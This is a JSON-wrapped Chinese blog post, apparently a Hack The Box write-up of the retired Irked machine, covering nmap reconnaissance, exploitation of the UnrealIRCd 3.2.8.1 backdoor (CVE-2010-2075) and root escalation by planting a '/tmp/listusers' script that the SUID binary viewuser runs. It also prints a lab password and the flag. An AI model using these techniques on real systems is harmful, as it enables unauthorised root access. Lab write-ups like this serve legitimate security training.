{"id":118,"date":"2024-11-13T09:25:39","date_gmt":"2024-11-13T01:25:39","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=118"},"modified":"2024-11-13T09:50:07","modified_gmt":"2024-11-13T01:50:07","slug":"htb_machine_irked","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/htb_machine_irked\/","title":{"rendered":"HTB\u9776\u673a Irked \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<\/strong><code>10.10.10.117<\/code><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/\u2026\/Documents\/pentest_notes\/irked\/nmap_reports]\n\u2514\u2500# ping -c 4 10.10.10.117\nPING 10.10.10.117 (10.10.10.117) 56(84) bytes of data.\n64 bytes from 10.10.10.117: icmp_seq=1 ttl=63 time=269 ms\n64 bytes from 10.10.10.117: icmp_seq=2 ttl=63 time=268 ms\n64 bytes from 10.10.10.117: icmp_seq=3 ttl=63 time=268 ms\n64 bytes from 10.10.10.117: icmp_seq=4 ttl=63 time=269 ms\n\n--- 10.10.10.117 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3071ms\nrtt min\/avg\/max\/mdev = 268.217\/268.556\/269.083\/0.346 ms<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u901a\u4fe1\u72b6\u51b5\u826f\u597d\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Jul 12 08:30:38 2024 as: nmap -sF -p- --min-rate 2000 -oN .\/fin_result.txt 10.10.10.117\nNmap scan report for irked.htb (10.10.10.117)\nHost is up (0.36s latency).\nNot shown: 65528 closed tcp ports (reset)\nPORT      STATE         SERVICE\n22\/tcp    open|filtered ssh\n80\/tcp    open|filtered http\n111\/tcp   open|filtered rpcbind\n6697\/tcp  open|filtered ircs-u\n8067\/tcp  open|filtered infi-async\n44349\/tcp open|filtered unknown\n65534\/tcp open|filtered unknown\n\n# Nmap done at Fri Jul 12 08:31:14 2024 -- 1 IP address (1 host up) scanned in 36.06 seconds<\/code><\/pre>\n<p>\u9776\u673a\u5f00\u653e\u4e86<code>7<\/code>\u4e2a<code>TCP<\/code>\u7aef\u53e3\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><code>TCP<\/code><strong>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Jul 12 08:33:57 2024 as: nmap -sS -sV -A -p 22,80,111,6697,8067,44349,65534 -oN .\/tcp_result.txt 10.10.10.117\nNmap scan report for irked.htb (10.10.10.117)\nHost is up (0.36s latency).\n\nPORT      STATE SERVICE VERSION\n22\/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)\n| ssh-hostkey: \n|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)\n|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)\n|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)\n|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)\n80\/tcp    open  http    Apache httpd 2.4.10 ((Debian))\n|_http-title: Site doesn't have a title (text\/html).\n|_http-server-header: Apache\/2.4.10 (Debian)\n111\/tcp   open  rpcbind 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|   100000  3,4          111\/udp6  rpcbind\n|   100024  1          44349\/tcp   status\n|   100024  1          46842\/tcp6  status\n|   100024  1          53849\/udp   status\n|_  100024  1          60642\/udp6  status\n6697\/tcp  open  irc     UnrealIRCd\n8067\/tcp  open  irc     UnrealIRCd\n44349\/tcp open  status  1 (RPC #100024)\n65534\/tcp open  irc     UnrealIRCd\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nAggressive OS guesses: Linux 3.12 (96%), Linux 3.13 (96%), Linux 3.16 (96%), Linux 3.18 (96%), Linux 3.2 - 4.9 (96%), Linux 3.8 - 3.11 (96%), Linux 4.4 (95%), Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using port 443\/tcp)\nHOP RTT       ADDRESS\n1   363.31 ms 10.10.14.1 (10.10.14.1)\n2   363.45 ms irked.htb (10.10.10.117)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Fri Jul 12 08:34:35 2024 -- 1 IP address (1 host up) scanned in 37.88 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Jul 12 08:36:10 2024 as: nmap -sU -p- --min-rate 2000 -oN .\/udp_ports.txt 10.10.10.117\nWarning: 10.10.10.117 giving up on port because retransmission cap hit (10).\nNmap scan report for irked.htb (10.10.10.117)\nHost is up (0.36s latency).\nNot shown: 65167 open|filtered udp ports (no-response), 365 closed udp ports (port-unreach)\nPORT      STATE SERVICE\n111\/udp   open  rpcbind\n5353\/udp  open  zeroconf\n53849\/udp open  unknown\n\n# Nmap done at Fri Jul 12 08:42:14 2024 -- 1 IP address (1 host up) scanned in 364.26 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Jul 12 08:43:55 2024 as: nmap -sU -sV -A -p 111,5353,53849 -oN .\/udp_report.txt 10.10.10.117\nNmap scan report for irked.htb (10.10.10.117)\nHost is up (0.36s latency).\n\nPORT      STATE SERVICE VERSION\n111\/udp   open  rpcbind 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|   100000  3,4          111\/udp6  rpcbind\n|   100024  1          44349\/tcp   status\n|   100024  1          46842\/tcp6  status\n|   100024  1          53849\/udp   status\n|_  100024  1          60642\/udp6  status\n5353\/udp  open  mdns    DNS-based service discovery\n| dns-service-discovery: \n|   9\/tcp workstation\n|     Address=10.10.10.117 dead:beef::250:56ff:fe94:f197\n|   80\/tcp http\n|_    Address=10.10.10.117 dead:beef::250:56ff:fe94:f197\n53849\/udp open  status  1 (RPC #100024)\nToo many fingerprints match this host to give specific OS details\nNetwork Distance: 2 hops\n\nTRACEROUTE (using port 443\/tcp)\nHOP RTT       ADDRESS\n1   361.20 ms 10.10.14.1 (10.10.14.1)\n2   361.38 ms irked.htb (10.10.10.117)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Fri Jul 12 08:44:07 2024 -- 1 IP address (1 host up) scanned in 12.04 seconds<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3a<code>Debian Linux<\/code>\uff0c\u5185\u6838\u7248\u672c\u5927\u81f4\u4e3a<code>Linux 3.12<\/code>\u3002<\/p>\n<hr \/>\n<h1>\u670d\u52a1\u63a2\u6d4b<\/h1>\n<h2>SSH\u670d\u52a1\uff0822\u7aef\u53e3\uff09<\/h2>\n<p>\u7aef\u53e3<code>Banner<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/megumin\/Documents\/pentest_notes\/irked]\n\u2514\u2500# nc -nv 10.10.10.117 22                                             \n(UNKNOWN) [10.10.10.117] 22 (ssh) open\nSSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4<\/code><\/pre>\n<h2>IRC\u804a\u5929\u670d\u52a1<\/h2>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>Nmap<\/code>\u8fdb\u884c\u626b\u63cf\uff0c\u7ed3\u679c\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Jul 12 08:52:46 2024 as: nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 6697,8067,65534 -oN .\/irc_scan_report.txt 10.10.10.117\nNmap scan report for irked.htb (10.10.10.117)\nHost is up (0.36s latency).\n\nPORT      STATE SERVICE VERSION\n6697\/tcp  open  irc     UnrealIRCd (Admin email djmardov@irked.htb)\n| irc-botnet-channels: \n|_  ERROR: Closing Link: [10.10.14.2] (Throttled: Reconnecting too fast) -Email djmardov@irked.htb for more information.\n8067\/tcp  open  irc     UnrealIRCd (Admin email djmardov@irked.htb)\n| irc-botnet-channels: \n|_  ERROR: Closing Link: [10.10.14.2] (Throttled: Reconnecting too fast) -Email djmardov@irked.htb for more information.\n65534\/tcp open  irc     UnrealIRCd (Admin email djmardov@irked.htb)\n| irc-botnet-channels: \n|_  ERROR: Closing Link: [10.10.14.2] (Throttled: Reconnecting too fast) -Email djmardov@irked.htb for more information.\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Fri Jul 12 08:52:48 2024 -- 1 IP address (1 host up) scanned in 2.49 seconds<\/code><\/pre>\n<p>\u53d1\u73b0\u57df\u540d<code>irked.htb<\/code>\uff0c\u7591\u4f3c\u8d85\u7ba1\u7528\u6237\u540d<code>djmardov<\/code>\u3002<\/p>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>djmardov<\/code>\u7528\u6237\u540d\u767b\u5f55<code>IRC<\/code>\u804a\u5929\u670d\u52a1\u5668\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720746480177-d95cad4d-5fdf-47f8-8768-0f78adcdd001.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0\u8be5\u804a\u5929\u670d\u52a1\u5668\u7684\u7248\u672c\u4e3a<code>UnrealIRCd v3.2.8.1<\/code>\uff0c\u5b58\u5728<code>2<\/code>\u4e2a\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u3002<\/p>\n<hr \/>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>CVE-2010-2075<\/code>\u6f0f\u6d1e\u8fdb\u884c\u653b\u51fb\uff0c\u6210\u529f\u6536\u5230\u53cd\u5f39Shell\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720747661351-75546923-8127-4f6e-b359-3e4a753e5259.png\" alt=\"\" \/><\/p>\n<hr \/>\n<h1>\u6743\u9650\u63d0\u5347<\/h1>\n<h2>\u7591\u4f3c\u5bc6\u7801\u6587\u4ef6\u6536\u96c6<\/h2>\n<p>\u5728<code>\/home\/djmardov\/Documents<\/code>\u76ee\u5f55\u4e0b\u53d1\u73b0\u7591\u4f3c\u5bc6\u7801\u5907\u4efd\u6587\u4ef6<code>.backup<\/code>\uff0c\u6587\u4ef6\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-plain\">Super elite steg backup pw\nUPupDOWNdownLRlrBAbaSSss<\/code><\/pre>\n<h2>\u672c\u5730\u4fe1\u606f\u6536\u96c6<\/h2>\n<p><strong>\u57fa\u672c\u7cfb\u7edf\u4fe1\u606f<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749872931-660cb743-6b2f-4345-be14-69f6260d992f.png\" alt=\"\" \/><\/p>\n<p><strong>\u8fdb\u7a0b\u5217\u8868<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749879561-e5a97758-5f12-44e2-8935-16cee67780f8.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749884493-5550d1c1-9b26-4b3f-af4a-ecbdf5f2b3f9.png\" alt=\"\" \/><\/p>\n<p><strong>\u8ba1\u5212\u4efb\u52a1\u5217\u8868<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749891627-18b21595-c04f-4376-b13b-275832360907.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749895979-6514e77c-d826-4e33-b2c0-cb441b900081.png\" alt=\"\" \/><\/p>\n<p><strong>\u73af\u5883\u53d8\u91cf<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749901981-7462008c-bfcd-4b01-aed8-99f1e02cc4e0.png\" alt=\"\" \/><\/p>\n<p><strong>\u7528\u6237\u4fe1\u606f<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749909790-47949c23-589f-44f9-abe7-7b599b2f9047.png\" alt=\"\" \/><\/p>\n<p><strong>\u7528\u6237\u5bb6\u76ee\u5f55<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749941308-9cf791c5-9c6b-4c37-8c30-8cce744f3ae2.png\" alt=\"\" \/><\/p>\n<p><strong>\u7279\u6b8a\u6743\u9650\u6587\u4ef6<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749948771-b579d005-b5aa-4fe8-b49c-289cf744e232.png\" alt=\"\" \/><\/p>\n<p><strong>\u5f00\u653e\u7aef\u53e3\u4fe1\u606f<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749963546-3b0ca7bd-1223-4f08-8fd1-73cd331e66c9.png\" alt=\"\" \/><\/p>\n<p><strong>\u654f\u611f\u6587\u4ef6\u6743\u9650<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749971068-3f1bf84f-c8e9-461d-956a-a96aa4ea01e9.png\" alt=\"\" \/><\/p>\n<p>\u7ecf\u5206\u6790\u7814\u5224\uff0c\u53d1\u73b0\u964c\u751f\u7a0b\u5e8f<code>\/usr\/bin\/viewuser<\/code>\u5177\u6709<code>SUID<\/code>\uff0c\u5c5e\u4e3b\u4e3a<code>root<\/code>\uff0c\u6743\u9650\u4e3a<code>4755<\/code>\uff0c\u51b3\u5b9a\u5c06\u8be5\u7a0b\u5e8f\u4f5c\u4e3a\u5165\u53e3\u63d0\u6743\u3002<\/p>\n<h2>SUID\u7a0b\u5e8f\u63d0\u6743<\/h2>\n<p>\u5c06<code>\/usr\/bin\/viewuser<\/code>\u7a0b\u5e8f\u4e0b\u8f7d\u81f3\u672c\u5730\uff0c\u4f7f\u7528<code>IDA Pro<\/code>\u751f\u6210\u4f2a\u4ee3\u7801\uff1a<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  puts(\"This application is being devleoped to set and test user permissions\");\n  puts(\"It is still being actively developed\");\n  system(\"who\");\n  setuid(0);\n  system(\"\/tmp\/listusers\");\n  return 0;\n}<\/code><\/pre>\n<p>\u53d1\u73b0\u7a0b\u5e8f\u5148\u6253\u5370\u4e86\u4e00\u4e32\u6587\u672c\uff0c\u968f\u540e\u6267\u884c\u4e86<code>who<\/code>\u547d\u4ee4\u63d0\u6743\uff0c\u63a5\u7740\u5c06\u7a0b\u5e8f<code>SUID<\/code>\u8bbe\u7f6e\u4e3a<code>0<\/code>\uff0c\u7136\u540e\u52a0\u8f7d\u4e86\u4e0d\u5b58\u5728\u7684\u811a\u672c<code>\/tmp\/listusers<\/code>\u3002<\/p>\n<p>\u76f4\u63a5\u521b\u5efa\u6076\u610f\u811a\u672c<code>\/tmp\/listusers<\/code>\uff1a<\/p>\n<pre><code class=\"language-bash\">#! \/bin\/bash\npasswd root<\/code><\/pre>\n<p>\u968f\u540e\u76f4\u63a5\u8fd0\u884c<code>viewuser<\/code>\u547d\u4ee4\uff0c\u4fee\u6539<code>root<\/code>\u5bc6\u7801\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720751890035-30da3f3a-0ec8-4f8f-ae1d-ebbdc4f54f7c.png\" alt=\"\" \/><\/p>\n<p><strong>\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>Flag\u6587\u4ef6\u5c55\u793a<\/h1>\n<pre><code class=\"language-plain\">a7ba3d1a40dfdf8455abdd3325f59ccf<\/code><\/pre>\n<hr \/>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.10.117 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b \u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/\u2026 &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-118","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/118","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=118"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/118\/revisions"}],"predecessor-version":[{"id":119,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/118\/revisions\/119"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=118"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=118"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=118"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}